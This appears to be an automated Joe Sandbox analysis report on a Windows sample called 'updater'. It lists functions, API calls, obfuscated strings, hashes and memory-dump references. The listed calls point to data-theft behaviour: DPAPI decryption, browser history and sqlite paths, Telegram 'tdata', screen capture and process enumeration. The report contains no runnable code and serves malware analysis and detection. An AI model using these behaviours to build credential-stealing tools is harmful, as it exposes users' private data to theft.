Opcode Fuzzy Hash: dd301688c129b2f13036f4dbf0a4c1624ddca9aad7f76dc6ff9a8fcfea1a89b3
Instruction Fuzzy Hash: 09521831D04286CFDB25EFA8C844BEDBB71BF25718F14409EE4496B2A2DB705E89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013C3095 Relevance: 22.1, Strings: 17, Instructions: 872
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!, xrefs: 013C3D39
]|, xrefs: 013C3840
Z@OC, xrefs: 013C371B
., xrefs: 013C3CAD
Install Directory, xrefs: 013C31B0
\Main, xrefs: 013C3260
]A@., xrefs: 013C35FB
hAVs, xrefs: 013C37B9
]., xrefs: 013C3313
., xrefs: 013C372F
[]K\, xrefs: 013C37C7
BAIG@], xrefs: 013C362D
., xrefs: 013C37D4
Z@OC, xrefs: 013C388C
HGBK, xrefs: 013C330C
., xrefs: 013C38A0
., xrefs: 013C396D

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
String ID: !$.$.$.$.$.$BAIG@]$HGBK$Install Directory$Z@OC$Z@OC$[]K\$\Main$]|$].$]A@.$hAVs
API String ID: 1208101283-1360112660
Opcode ID: 6a8e9b4653f013fb1d5fa5b10c04950db8f5303c7174ebc08453999a8b7fe91c
Instruction ID: ea00767e8cdfb32a4ea81302418bdfdb9d451ae2c9c3549771b612028883b5a0
Opcode Fuzzy Hash: 6a8e9b4653f013fb1d5fa5b10c04950db8f5303c7174ebc08453999a8b7fe91c
Instruction Fuzzy Hash: A2723930D0039A9BDB25EBA8CC44BEDBB70BF21718F14819ED5096B1A2DF705E89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013C04AD Relevance: 20.1, Strings: 15, Instructions: 1382COMMON

Download Yara Rule

Strings

dOLLK\r., xrefs: 013C099E
=, xrefs: 013C1AFB
dOLLK\r., xrefs: 013C0E49
r~}g, xrefs: 013C08F8
., xrefs: 013C090B
\history\, xrefs: 013C0EDA, 013C1A01
r~}gr., xrefs: 013C18FE
\history, xrefs: 013C0AFA, 013C1622
., xrefs: 013C0DA9
rOMMA[@Z], xrefs: 013C0746
B., xrefs: 013C1257
r~}gr., xrefs: 013C1468
rOMMA[@Z], xrefs: 013C0880
B., xrefs: 013C139C
r~}g, xrefs: 013C0D96

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$DeallocateEnterLeave$ConditionVariableWake
String ID: .$.$=$B.$B.$\history$\history\$dOLLK\r.$dOLLK\r.$rOMMA[@Z]$rOMMA[@Z]$r~}g$r~}g$r~}gr.$r~}gr.
API String ID: 4060657020-2226889094
Opcode ID: 9f041025e0721eb05a341e7e7ce45bdb52d5359bc942095a54ccb62ea182922a
Instruction ID: 935f8ed859213013fe60aa7966a50530bca5f02189ac8976d3a29075d1c926f9
Opcode Fuzzy Hash: 9f041025e0721eb05a341e7e7ce45bdb52d5359bc942095a54ccb62ea182922a
Instruction Fuzzy Hash: A4D29130D0429ADEDB25EBA8C994BEDBB70AF25708F1040DED5496B292DB705F88CF51

Uniqueness

Uniqueness Score: -1.00%

Function 013CA518 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 238
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(01455C78), ref: 013CA5B7
GetProcAddress.KERNEL32(00000000,0145606C), ref: 013CA645
GetProcAddress.KERNEL32(01455180), ref: 013CA754
GetProcAddress.KERNEL32(00000000), ref: 013CA76E
GetProcAddress.KERNEL32(00000000), ref: 013CA7D7
GetProcAddress.KERNEL32(01454F88), ref: 013CA6CA

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

GetProcAddress.KERNEL32(01456088), ref: 013CA861

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

FreeLibrary.KERNEL32 ref: 013CA8AA

Strings

., xrefs: 013CA7F8
XO[BZMBG, xrefs: 013CA57A
gZKC, xrefs: 013CA7F1

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalSection$EnterLeaveLibrary$ConditionFreeLoadVariableWake
String ID: .$XO[BZMBG$gZKC
API String ID: 2402374661-770554371
Opcode ID: 062888d3675fe64bf27916bd57ba3d136f43f850da38b48c930e8f2fa0b88114
Instruction ID: 94faac4f4a8481c380126ec17ce5e8e5b2469e7d45cfb33ec283e9c84d9f20f8
Opcode Fuzzy Hash: 062888d3675fe64bf27916bd57ba3d136f43f850da38b48c930e8f2fa0b88114
Instruction Fuzzy Hash: 63912474900386ABDB22EFA9E44466DBFF0AB51718F1A011ED550AF2B6EB7098C5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013F61B5 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32(?,00000000,?), ref: 013F6277
GetLastError.KERNEL32 ref: 013F6281
___std_fs_open_handle@16.LIBCPMT ref: 013F62E9
GetLastError.KERNEL32 ref: 013F6353

Strings

GetFileInformationByHandleEx, xrefs: 013F6303
kernel32.dll, xrefs: 013F6308

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$LongNamePath___std_fs_open_handle@16
String ID: GetFileInformationByHandleEx$kernel32.dll
API String ID: 2391694696-1782754588
Opcode ID: 28b5d85ac4544d9503d695ab65bfd907e27e77257a8f35d77de27785433e1f0f
Instruction ID: 7288ceec6ef98d22fd730936b3ce994690b846a471713d4be241f7046fe1da3a
Opcode Fuzzy Hash: 28b5d85ac4544d9503d695ab65bfd907e27e77257a8f35d77de27785433e1f0f
Instruction Fuzzy Hash: 27A19EB59002199FEB24CF28C945BA9BBF4EF05328F1442ADEE65E7391E770D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013CB7C3 Relevance: 15.2, APIs: 10, Instructions: 155
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

KiUserCallbackDispatcher.NTDLL ref: 013CB8AB
GetSystemMetrics.USER32 ref: 013CB8B4
GetDC.USER32(00000000), ref: 013CB8BB
SelectObject.GDI32(00000000,00000000), ref: 013CB8E5
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 013CB8FE

Part of subcall function 013B4619: InitializeCriticalSectionEx.KERNEL32(01454D88,00000000,00000000,?,013B471E,?,?,013B46CC), ref: 013B465C
Part of subcall function 013B4619: GetLastError.KERNEL32(?,013B471E,?,?,013B46CC), ref: 013B4666

EnterCriticalSection.KERNEL32(00000004), ref: 013CB937
LeaveCriticalSection.KERNEL32(00000004), ref: 013CB941

Part of subcall function 013B4BCB: GetObjectA.GDI32(?,00000054,?), ref: 013B4BDF

DeleteDC.GDI32(?), ref: 013CB96F
DeleteObject.GDI32(00000000), ref: 013CB976
ReleaseDC.USER32(00000000,?), ref: 013CB981

Part of subcall function 013B46E3: DeleteObject.GDI32(?), ref: 013B4711
Part of subcall function 013B46E3: EnterCriticalSection.KERNEL32(00000004,?,?,013B46CC), ref: 013B4724
Part of subcall function 013B46E3: LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,013B46CC), ref: 013B4738

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$Object$Delete$EnterLeave$CallbackDeallocateDispatcherErrorInitializeLastMetricsReleaseSelectSystemUser
String ID:
API String ID: 1025157159-0
Opcode ID: 37a7f6b75709e0cd4a7803369f7390360468869e65d9d2b1c79ee48ae838779f
Instruction ID: 460aa769659c0512a88f4a955c396e115b91f01250ff7d18c0c3325fd5bca471
Opcode Fuzzy Hash: 37a7f6b75709e0cd4a7803369f7390360468869e65d9d2b1c79ee48ae838779f
Instruction Fuzzy Hash: 6E51AF71D0025AEFEB14EBA4DD44BEEBBB8EF24304F10419AE509A7191EB705E45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013B7D35 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 400
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDesktopWindow.USER32 ref: 013B801F
GetTickCount.KERNEL32(?,?,014443AB), ref: 013B8027

Part of subcall function 013B7BE2: CloseHandle.KERNEL32(00000000), ref: 013B7BF7

Strings

UT, xrefs: 013B7F72

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CloseCountDesktopHandleTickWindow
String ID: UT
API String ID: 3281157955-894488996
Opcode ID: f3a115c0926e2665874182787a0273d6d09f36eb459b632ef3768c90ec86d2ee
Instruction ID: 8c24dfa083432f483a8127446a467964c1a5d89a614646e7ac17e1909e5ddc54
Opcode Fuzzy Hash: f3a115c0926e2665874182787a0273d6d09f36eb459b632ef3768c90ec86d2ee
Instruction Fuzzy Hash: 54F19C716087429FD715DF69C4C0BAABBE8FF95308F14482EE68587B91E730E548CB92

Uniqueness

Uniqueness Score: -1.00%

Function 013C9151 Relevance: 13.7, Strings: 10, Instructions: 1230COMMON

Download Yara Rule

Strings

M, xrefs: 013CA27B
., xrefs: 013C9E57
(size: , xrefs: 013C9832, 013C9D55, 013CA1CE
@, xrefs: 013C998E
mAAEGK]., xrefs: 013C9928
jOZO, xrefs: 013C9E4D
bAIG, xrefs: 013C948B
ZO, xrefs: 013C949F
., xrefs: 013C94AF
.sqlite, xrefs: 013C93DC

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$DeallocateEnterLeave$ConditionVariableWake
String ID: (size: $.$.$.sqlite$@$M$ZO$bAIG$jOZO$mAAEGK].
API String ID: 4060657020-1872904414
Opcode ID: d374834100c3f7a0db308518d1bce99c47189d86b2df29fdaeb3c3942dff2539
Instruction ID: 6179b1d6e8b865af6b49c0ff3ff91336b6f2f54b3abd6198f731286c9d8d545b
Opcode Fuzzy Hash: d374834100c3f7a0db308518d1bce99c47189d86b2df29fdaeb3c3942dff2539
Instruction Fuzzy Hash: 6EB28C71C0029ADEDF15EBA8C850BEDBBB5AF24708F1041AED40967291EB345F49CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013B9294 Relevance: 11.0, Strings: 8, Instructions: 1004COMMON

Download Yara Rule

Strings

B, xrefs: 013BA0EB
rMA@HGI., xrefs: 013B9961
}ZKO, xrefs: 013B9D8D
]]H@, xrefs: 013B967D
@HGI, xrefs: 013B9D9D
}ZKOC~OZF., xrefs: 013B92FB
., xrefs: 013B9ED4
@r, xrefs: 013B9EC7

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionVariableWake
String ID: .$@HGI$@r$B$]]H@$rMA@HGI.$}ZKO$}ZKOC~OZF.
API String ID: 2013694253-3658648673
Opcode ID: 38189a4a00d9cd512ebaf81c8f80bf64fc03bc81e39adb812ca2389dbdd7e90f
Instruction ID: 958a383dfc563bf79e5626ab1e86517f776e2096d775a58a2b81666df1a0b2c3
Opcode Fuzzy Hash: 38189a4a00d9cd512ebaf81c8f80bf64fc03bc81e39adb812ca2389dbdd7e90f
Instruction Fuzzy Hash: 3192C070C04299DEDB15EBA8C894BEDBB75BF24308F1441EED5096B291EB701E89CF61

Uniqueness

Uniqueness Score: -1.00%

Function 013BC9EC Relevance: 10.6, Strings: 8, Instructions: 609COMMON

Download Yara Rule

Strings

map, xrefs: 013BD109
\tdata\, xrefs: 013BCB5A
., xrefs: 013BCA32
., xrefs: 013BD1D1
zKBKI\OC, xrefs: 013BCA57
)\tdata\, xrefs: 013BD240
m., xrefs: 013BCF8C
#, xrefs: 013BD277

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionVariableWake
String ID: #$)\tdata\$.$.$\tdata\$m.$map$zKBKI\OC
API String ID: 2013694253-2410336440
Opcode ID: 248abbb76e026394b359b154f67a269d84c348536b2ad96bd50033fe6f15d622
Instruction ID: 0879b669a3f5dce48b426d3f477d8b527a6ea44dcf998768b699e5b95c8ff028
Opcode Fuzzy Hash: 248abbb76e026394b359b154f67a269d84c348536b2ad96bd50033fe6f15d622
Instruction Fuzzy Hash: F0429230D0025ACBDB25EBA8C894BEDFBB4BF65304F1041AED54967291EB705E89CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01423BF4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0143E0E8), ref: 01423C5E
_free.LIBCMT ref: 01423C4C

Part of subcall function 01420123: HeapFree.KERNEL32(00000000,00000000), ref: 01420139
Part of subcall function 01420123: GetLastError.KERNEL32(?,?,0141DA9C), ref: 0142014B

_free.LIBCMT ref: 01423E18

Strings

Pacific Standard Time, xrefs: 01423CCD
Pacific Daylight Time, xrefs: 01423CFC

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 2155170405-1154798116
Opcode ID: c6dc522801133445de4eba6d179d41830c22bafd81a823d7e20fa31cdd31121f
Instruction ID: 22c1e20fcd55f2c61813afed7fdf853581b6baed344a58a62c704b36ace36dc2
Opcode Fuzzy Hash: c6dc522801133445de4eba6d179d41830c22bafd81a823d7e20fa31cdd31121f
Instruction Fuzzy Hash: 7F511B71900225ABDB20DF6ADC809AA7BB8FF64310F54016FE550972B5E7749DC1CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013CAF64 Relevance: 8.0, Strings: 6, Instructions: 527COMMON

Download Yara Rule

Strings

., xrefs: 013CAFAD
{}k|jozo, xrefs: 013CB0CF
r., xrefs: 013CB632
{]K\]r, xrefs: 013CAFDC
PlayerName, xrefs: 013CB423
.txt, xrefs: 013CB416, 013CB4FC

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionVariableWake
String ID: .$.txt$PlayerName$r.${]K\]r${}k|jozo
API String ID: 2013694253-2290431626
Opcode ID: e50e0f88b7c904e1a74d5aefd1a95a830d8d2c5daddcd921700074f173f557ce
Instruction ID: f21cd91fb574ac7959d9620c4ab45b3d998ab48a1a8eb003a1ce7be05217c3eb
Opcode Fuzzy Hash: e50e0f88b7c904e1a74d5aefd1a95a830d8d2c5daddcd921700074f173f557ce
Instruction Fuzzy Hash: 60223130D04286CECB15EFE8D445AEDFBB0AF25718F24006ED4506F2A6DB746E89CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013F6107 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

FindClose.KERNEL32(000000FF,?,013F6136,?,?,?,?,013B2C64,?,?,?,?), ref: 013F6113
FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,?,013F6136,?), ref: 013F6143
GetLastError.KERNEL32(?,?,?,?,013F6136,?,?,?,?,013B2C64,?,?,?,?), ref: 013F6150
FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,013F6136,?,?,?,?,013B2C64), ref: 013F616A
GetLastError.KERNEL32(?,?,?,?,013F6136,?,?,?,?,013B2C64,?,?,?,?), ref: 013F6177

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Find$ErrorFileFirstLast$Close
String ID:
API String ID: 569926201-0
Opcode ID: b040c22e628349f7ab753a893e3abcacf8ff95e22af7efee5a04fd67299b6cdf
Instruction ID: 03c61bf9dd29e3b4e03a05dcd1ff9edcd3b1b827688495a37e7a91a7321e7190
Opcode Fuzzy Hash: b040c22e628349f7ab753a893e3abcacf8ff95e22af7efee5a04fd67299b6cdf
Instruction Fuzzy Hash: 460140B2100149BBDB301F7ADC4DC5B7F79EB92765B10461DF7A5811A6C6318451D760

Uniqueness

Uniqueness Score: -1.00%

Function 01412780 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0141277F,?,?,?,?,?,01413E8D), ref: 014127A2
TerminateProcess.KERNEL32(00000000,?,0141277F,?,?,?,?,?,01413E8D), ref: 014127A9
ExitProcess.KERNEL32 ref: 014127BB

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 53a1f74bdac4baae3ea83f2c3bb3650fd614804e4f7df7500f5659d621861a29
Instruction ID: 8c6a5c8e7ab50a12d54a4e9e7cfaba9d0308338991c75d2e4bf328e66402a73c
Opcode Fuzzy Hash: 53a1f74bdac4baae3ea83f2c3bb3650fd614804e4f7df7500f5659d621861a29
Instruction Fuzzy Hash: 45E08675000108AFCF216F69D848D4E3F79FB54652B144415F968C6239CB75D881DB40

Uniqueness

Uniqueness Score: -1.00%

Function 013C2705 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(Jx~`.,00000000,00000000,00000000,00000000,00000000,?,?,-00000046,00000000), ref: 013C273D

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Strings

r`A\Jx~`., xrefs: 013C2743

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CryptDataDeallocateUnprotect
String ID: r`A\Jx~`.
API String ID: 174072602-705364654
Opcode ID: a5d6553fee9935b6bb1b99d3a79e21aa9c49767fd1fd137e609e8b14a196b6d5
Instruction ID: 92dd00ca579d02245957e75fef81d7cf4969b635b0ab76bcc2837303118ca2e1
Opcode Fuzzy Hash: a5d6553fee9935b6bb1b99d3a79e21aa9c49767fd1fd137e609e8b14a196b6d5
Instruction Fuzzy Hash: 39113D75D0020AAFDB15DFA9D4909EEFBB4FF58A04F00416EF411A3250DB745A08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013C6592 Relevance: 3.1, APIs: 2, Instructions: 126processCOMMON

Download Yara Rule

APIs

Process32Next.KERNEL32(?,00000128,?,?,?), ref: 013C66E6
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000001,00000000), ref: 013C65DE

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CreateDeallocateNextProcess32SnapshotToolhelp32
String ID:
API String ID: 2624477505-0
Opcode ID: ef1ae940a04ab088acd7122431d0ab7c73d55e986fbbd6df1e65d39c11032b17
Instruction ID: 961ea2926e0be95a23e755e9edeba013d4125df1393b300d391915576b38aacd
Opcode Fuzzy Hash: ef1ae940a04ab088acd7122431d0ab7c73d55e986fbbd6df1e65d39c11032b17
Instruction Fuzzy Hash: 445129B1D0020A9FDF10DF99C980AEEBBB9FF58704F14416EE415A7251DB70AE45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0140E5AE Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0140E5B3

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ad328f8696725e402774c48f70003e2b97f100a1e37c4a2168a9b716593e854d
Instruction ID: 674a323dbc5847ee12423c41d351f9fc01bb4ed2a903e33e2de0308fea727abe
Opcode Fuzzy Hash: ad328f8696725e402774c48f70003e2b97f100a1e37c4a2168a9b716593e854d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

